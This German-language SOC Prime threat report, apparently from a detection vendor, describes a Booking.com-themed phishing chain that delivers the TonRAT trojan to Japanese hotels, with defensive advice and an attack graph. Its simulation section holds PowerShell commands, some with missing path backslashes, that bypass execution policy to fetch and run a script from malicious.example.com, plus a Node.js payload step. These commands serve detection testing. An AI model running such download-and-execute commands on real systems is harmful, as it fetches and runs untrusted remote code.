Analyse verdächtiger E-Mails, die auf die Hotelbranche abzielen

SOC Prime Team

Folgen

Analyse verdächtiger E-Mails, die auf die Hotelbranche abzielen

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Zusammenfassung

Eine Phishing-Kampagne, die sich als Booking.com ausgibt, zielte über Infrastruktur, die auf Calendly und SendGrid gehostet wird, auf Hotelbetreiber in Japan ab. Die E-Mail enthielt einen verkürzten Link, der zu einem ZIP-Archiv führte, das eine bösartige LNK-Verknüpfung enthielt, die dann einen auf PowerShell basierenden Loader startete. Dieser Loader holte zusätzliche PowerShell-Skripte, entschlüsselte eine als TonRAT identifizierte JavaScript-Nutzlast, lud Node.js herunter und führte den RAT aus. Die Malware etablierte dann eine Kommando- und Kontrollverbindung über einen WebSocket-Endpunkt, der über die TON API bezogen wurde.

Untersuchung

Der Bericht beschreibt die Analyse der E-Mail-Kopfzeilen, den Missbrauch legitimer Zustelldienste und die vollständige mehrstufige Ausführungskette, die bei dem Angriff verwendet wurde. Er liefert Datei-Hashes für das ZIP-Archiv und seine internen Komponenten und listet die während der Analyse beobachteten Kommando- und Kontroll-Domänen auf. Die Untersuchung enthält auch technische Details zur bösartigen LNK-Datei und den PowerShell-Befehlen, die zur Fortschreitung der Infektion verwendet wurden.

Abschwächung

Verteidiger sollten verdächtige verkürzte Calendly-Links blockieren, Absenderdomänen sorgfältig überprüfen und die Ausführung von LNK-Anhängen, die per E-Mail zugestellt werden, einschränken. Das Monitoring sollte sich auch auf unautorisierte PowerShell-Aktivitäten und unerwartete Node.js-Binärdateien auf Endgeräten konzentrieren. URL-Filterung kann helfen, den Zugriff auf die bekannten bösartigen Domains, die an der Kampagne beteiligt sind, zu blockieren.

Reaktion

Sicherheitsteams sollten Erkennungen für PowerShell-Befehle erstellen, die Inhalte von den identifizierten Kommando- und Kontroll-Domänen herunterladen, sowie für die Ausführung von node.exe aus ungewöhnlichen Orten. Warnungen sollten auch für E-Mail-Flüsse konfiguriert werden, die SendGrid-Kopfzeilen aus nicht vertrauenswürdigen oder unerwarteten Quellen verwenden. Ermittler sollten abgelegte Dateien sammeln und Netzwerkverkehr mit den beobachteten WebSocket-Kommunikationen aufbewahren.

"graph TB %% Klassen Definitionen classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#cccccc %% Knoten action_phishing["Aktion – T1566.002 Spearphishing-Link Phishing-E-Mail mit einem bösartigen Calendly-Link wird an das Opfer gesendet."] class action_phishing action action_user_click["Aktion – T1204.001 Benutzeraktion: Bösartiger Link Das Opfer klickt auf den bösartigen Calendly-Link, wodurch der Browser ein ZIP-Archiv herunterlädt."] class action_user_click action action_download_zip["Aktion – ZIP herunterladen ZIP-Archiv enthält eine Verknüpfung (.lnk) und eine Dummy-MP4-Datei."] class action_download_zip action action_open_shortcut["Aktion – T1547.009 Verknüpfungsänderung Das Opfer öffnet die .lnk-Verknüpfung, die einen PowerShell-Befehl ausführt."] class action_open_shortcut action tool_powershell["Werkzeug – PowerShell Zweck: Führt Befehle aus und lädt zusätzliche Nutzlasten herunter."] class tool_powershell tool action_download_script["Aktion – T1105 Ingress-Werkzeugübertragung PowerShell lädt ein zusätzliches Skript von einem entfernten Server herunter."] class action_download_script action action_download_js["Aktion – T1027.009 Eingebettete Nutzlasten PowerShell lädt ebenfalls eine verschlüsselte JavaScript-Nutzlast herunter."] class action_download_js action action_download_node["Aktion – Node.js-Laufzeit herunterladen Node.js-Laufzeit wird heruntergeladen und verwendet, um die nächste Phase zu starten."] class action_download_node process malware_tonrat["Malware – TonRAT JavaScript-basierter Remote-Zugriff-Trojaner, ausgeführt über Node.js."] class malware_tonrat malware action_dynamic_resolution["Aktion – T1568 Dynamische Auflösung TonRAT fragt die TON-API, um Kommando- und Kontroll-Domänen zur Laufzeit aufzulösen."] class action_dynamic_resolution action action_c2["Aktion – T1071.001 Anwendungsprotokollebenenprotokoll: Web-Protokolle Richtet einen WebSocket-Kanal für C2-Kommunikationen ein."] class action_c2 action %% Verbindungen action_phishing –>|führt zu| action_user_click action_user_click –>|löst aus| action_download_zip action_download_zip –>|enthält| action_open_shortcut action_open_shortcut –>|führt aus| tool_powershell tool_powershell –>|verwendet| action_download_script tool_powershell –>|verwendet| action_download_js action_download_script –>|stellt bereit| action_download_node action_download_js –>|stellt bereit| action_download_node action_download_node –>|startet| malware_tonrat malware_tonrat –>|führt aus| action_dynamic_resolution action_dynamic_resolution –>|ermöglicht| action_c2 "

Angriffsablauf

Angriffs-Narrativ & Befehle:
1. Erster Zugriff – PowerShell-Download
  Der Angreifer erlangt eine PowerShell-Remotesitzung auf dem kompromittierten Host und verwendet Invoke-WebRequest um das TonRAT-Loader-Skript von einem bösartigen C2-Server abzurufen. Dieser Schritt erfüllt die Invoke-WebRequest Zeichenkettenübereinstimmung.
```
powershell -NoProfile -ExecutionPolicy Bypass -Command ^
  "Invoke-WebRequest -Uri http://malicious.example.com/tonrat.ps1 -OutFile $env:TEMPtonrat.ps1"
```
2. Ausführung des Loaders
  Das heruntergeladene Skript wird ausgeführt, was wiederum einen zweiten PowerShell-Prozess erzeugt, um zusätzliche Befehle auszuführen (der immer noch das Wort „PowerShell“ enthält).
```
powershell -NoProfile -ExecutionPolicy Bypass -File $env:TEMPtonrat.ps1
```
3. Node.js-Nutzlast Ausführung
  TonRAT legt eine bösartige JavaScript-Datei ab (malicious.js) und startet sie mit der Node.js-Laufzeit (node.exe). Dies erzeugt die node.exe Zeichenkettenübereinstimmung.
```
# Angenommen, das Skript hat bereits malicious.js in C:Temp platziert
C:Program Filesnodejsnode.exe C:Tempmalicious.js
```
Die drei Prozesskreaturen (PowerShell mit Invoke-WebRequest, PowerShell, die den Loader ausführt und node.exe) erfüllen gemeinsam die Bedingung der Erkennungsregel.

Regressionstests- Skript:

#-------------------------------------------------
# TonRAT-Bereitstellungssimulation – löst Sigma-Regel aus
#-------------------------------------------------
$tempDir = "$env:TEMPtonrat_demo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# 1. Gefälschten Loader herunterladen (simuliert mit einem einfachen Echo)
$loaderUrl = "http://malicious.example.com/tonrat.ps1"
$loaderPath = "$tempDirtonrat.ps1"
Invoke-WebRequest -Uri $loaderUrl -OutFile $loaderPath -UseBasicParsing

# 2. Den Loader ausführen (der Loader erstellt nur eine Dummy-js-Datei)
powershell -NoProfile -ExecutionPolicy Bypass -File $loaderPath

# 3. Eine Dummy-JavaScript-Nutzlast erstellen
$jsPath = "C:Tempmalicious.js"
Set-Content -Path $jsPath -Value "console.log('Malicious payload executed');"

# 4. Die Nutzlast mit Node.js ausführen
$nodePath = "C:Program Filesnodejsnode.exe"
& $nodePath $jsPath
#-------------------------------------------------

Aufräumbefehle:

# Entfernen Sie alle durch die Simulation erstellten Artefakte
Remove-Item -Path "$env:TEMPtonrat_demo" -Recurse -Force
Remove-Item -Path "C:Tempmalicious.js" -Force
# Optional alle verbleibenden PowerShell/Node-Prozesse beenden (falls erforderlich)
Get-Process -Name "powershell","node" -ErrorAction SilentlyContinue | Stop-Process -Force

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten